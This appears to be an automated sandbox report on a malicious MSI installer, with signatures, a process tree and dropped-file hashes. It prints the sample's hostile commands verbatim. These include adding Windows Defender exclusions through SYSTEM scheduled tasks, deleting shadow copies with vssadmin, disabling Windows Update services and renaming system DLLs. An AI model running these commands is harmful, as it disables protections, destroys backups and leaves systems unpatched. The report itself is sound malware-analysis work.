Analysis

  • max time kernel
    144s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    02/08/2026, 10:16

General

  • Target
    install_s0up017.msi
  • Size 7.5MB
  • Sample260802-marksazhlb
  • SHA256 58b45d111326ebe96120a96df67c90e9e8b318fb863359fb4e20009a3cd12151
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 2 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 8 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 23 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_s0up017.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4532
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3328
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:116
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding C911517F01D464979122E31011C33D34 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:2864
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4448
  • C:\Users\Public\YuQAnJ\6rchRa.exe
    C:\Users\Public\YuQAnJ\6rchRa.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4232
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\YuQAnJ\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:2928
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\YuQAnJ\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4600
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:860
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:4792
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4756
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:408
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:3472
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:1604
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:2608
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3196
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:3060
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:4628
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:556
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3160
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:4816
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:516
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:1124
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:176
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:436
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:312
                        • C:\Program Files (x86)\Ckr1RW\Ckr1RW.exe
                          "C:\Program Files (x86)\Ckr1RW\Ckr1RW.exe"
                          2⤵
                          • UAC bypass
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • System Location Discovery: System Language Discovery
                          • System policy modification
                          PID:5056
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            PID:4684
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Ckr1RW" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            PID:4172
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Ckr1RW" /inheritance:r
                              4⤵
                              • Modifies file permissions
                              PID:1804
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:2864
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:1316
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:2236
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            PID:4180
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                                PID:2256
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  5⤵
                                    PID:4360
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\Ckr1RW\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                PID:436
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\Ckr1RW\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2540
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                    PID:2852
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                      PID:3348
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c echo.>c:\xxxx.ini
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:1776
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    PID:4036
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1912
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                        PID:3532
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                          PID:4404
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\Ckr1RW" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:1792
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\Ckr1RW" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Modifies file permissions
                                          PID:3484
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\Ckr1RW" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:880
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\Ckr1RW" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                          4⤵
                                          • Modifies file permissions
                                          PID:3400
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\Ckr1RW\Ckr1RW.exe" /inheritance:r
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:4792
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\Ckr1RW\Ckr1RW.exe" /inheritance:r
                                          4⤵
                                          • Modifies file permissions
                                          PID:4352
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\Ckr1RW\Ckr1RW.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:3780
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\Ckr1RW\Ckr1RW.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Modifies file permissions
                                          PID:1764
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\Ckr1RW\Ckr1RW.exe" /grant:r Users:(RX) /deny Users:(DE)
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:3416
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\Ckr1RW\Ckr1RW.exe" /grant:r Users:(RX) /deny Users:(DE)
                                          4⤵
                                          • Modifies file permissions
                                          PID:780
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\Ckr1RW\image.png" /inheritance:r
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:2200
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\Ckr1RW\image.png" /inheritance:r
                                          4⤵
                                          • Modifies file permissions
                                          PID:2156
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\Ckr1RW\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:2816
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\Ckr1RW\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Modifies file permissions
                                          PID:3552
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\Ckr1RW\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:1936
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\Ckr1RW\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                          4⤵
                                          • Modifies file permissions
                                          PID:4836
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\Ckr1RW\thumbs.db" /inheritance:r
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:4460
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\Ckr1RW\thumbs.db" /inheritance:r
                                          4⤵
                                          • Modifies file permissions
                                          PID:2128
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                        3⤵
                                        • Indicator Removal: Clear Persistence
                                        PID:3168
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                          4⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:744
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\Ckr1RW\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:552
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\YuQAnJ" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:1800
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\YuQAnJ" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:2156
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:3200
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:1056
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe
                                    1⤵
                                      PID:3984
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:4532
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4516
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:4440
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:1972
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:2420
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:1776
                                    • C:\Program Files (x86)\Ckr1RW\Ckr1RW.exe
                                      "C:\Program Files (x86)\Ckr1RW\Ckr1RW.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:408
                                    • C:\Program Files (x86)\f5yFmQ\2OrksO2.exe
                                      "C:\Program Files (x86)\f5yFmQ\2OrksO2.exe"
                                      1⤵
                                        PID:4304
                                      • C:\Windows\system32\cmd.exe
                                        cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                        1⤵
                                        • Executes a command shell one-liner
                                        PID:3732
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                          2⤵
                                            PID:2056

                                        Network

                                              MITRE ATT&CK Enterprise v16

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              e585996.rbs

                                              • Path C:\Config.Msi\e585996.rbs
                                              • Size 7KB
                                              • SHA256 b88b78e43881fb87fa1e34881bfdc57526536ae95781551a006a0c44d6f820d1
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              Ckr1RW.exe

                                              • Path C:\Program Files (x86)\Ckr1RW\Ckr1RW.exe
                                              • Size 145KB
                                              • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              XPSPLOG.dll

                                              • Path C:\Program Files (x86)\Ckr1RW\XPSPLOG.dll
                                              • Size 4.6MB
                                              • SHA256 16986db6e9e7856d06c54c6c0125d72036d5c0146303b62537757006a9f34a26
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              image.png

                                              • Path C:\Program Files (x86)\Ckr1RW\image.png
                                              • Size 5.0MB
                                              • SHA256 306dacdefc48cef6afcc07aed00d20eb24678d220c6ecccc8aa9f2739e56cfb1
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              thumbs.db

                                              • Path C:\Program Files (x86)\Ckr1RW\thumbs.db
                                              • Size 358KB
                                              • SHA256 ace4fa8c95a215117384c7ae9235c3aff35e1907034bafbb467d9c36a36a1506
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              XPSPLOG.dll

                                              • Path C:\Program Files (x86)\f5yFmQ\XPSPLOG.dll
                                              • Size 4.6MB
                                              • SHA256 f38b0e4aebcac6d1e2bbdd8ae7f96f62ff55dd0da508e6dc319b364ed9f5d792
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              image.png

                                              • Path C:\Program Files (x86)\f5yFmQ\image.png
                                              • Size 5.0MB
                                              • SHA256 069f13ccaa4c42fa6c0386b3bf7b1a8b2ee9a81f9f0781428aa8aa6fa543195f
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              destopbak.ini

                                              • Path C:\Users\Public\Music\destopbak.ini
                                              • Size 2B
                                              • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                              • MD5 SHA1 SHA512

                                              6rchRa.exe

                                              • Path C:\Users\Public\YuQAnJ\6rchRa.exe
                                              • Size 135KB
                                              • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              UxEnhance64.dll

                                              • Path C:\Users\Public\YuQAnJ\UxEnhance64.dll
                                              • Size 3.1MB
                                              • SHA256 c7c8fd0bfbe910701aa322ce0ee2eac21bddd2896302fb4f24a71c18d51ea92d
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              adoresd.dat

                                              • Path C:\Users\Public\YuQAnJ\adoresd.dat
                                              • Size 4.7MB
                                              • SHA256 206c4bd4ca48eed8a7b2aef9e9aa6774d9eda25e62211f316e6347f00fbce23f
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              msadox.tb

                                              • Path C:\Users\Public\YuQAnJ\msadox.tb
                                              • Size 8KB
                                              • SHA256 4adc1fe383adba0845bbd64934331bda4dc5c358b736eb969fa111cfd8d68d4b
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              MSI5B2C.tmp

                                              • Path C:\Windows\Installer\MSI5B2C.tmp
                                              • Size 7.4MB
                                              • SHA256 c5622825cc30c9888fdacd2cfd1660629ed0911c02ac12c6b3e39219f769100f
                                              • MD5 SHA1 SHA512 SSDEEP TLSH

                                              e585995.msi

                                              • Path C:\Windows\Installer\e585995.msi
                                              • Size 7.5MB
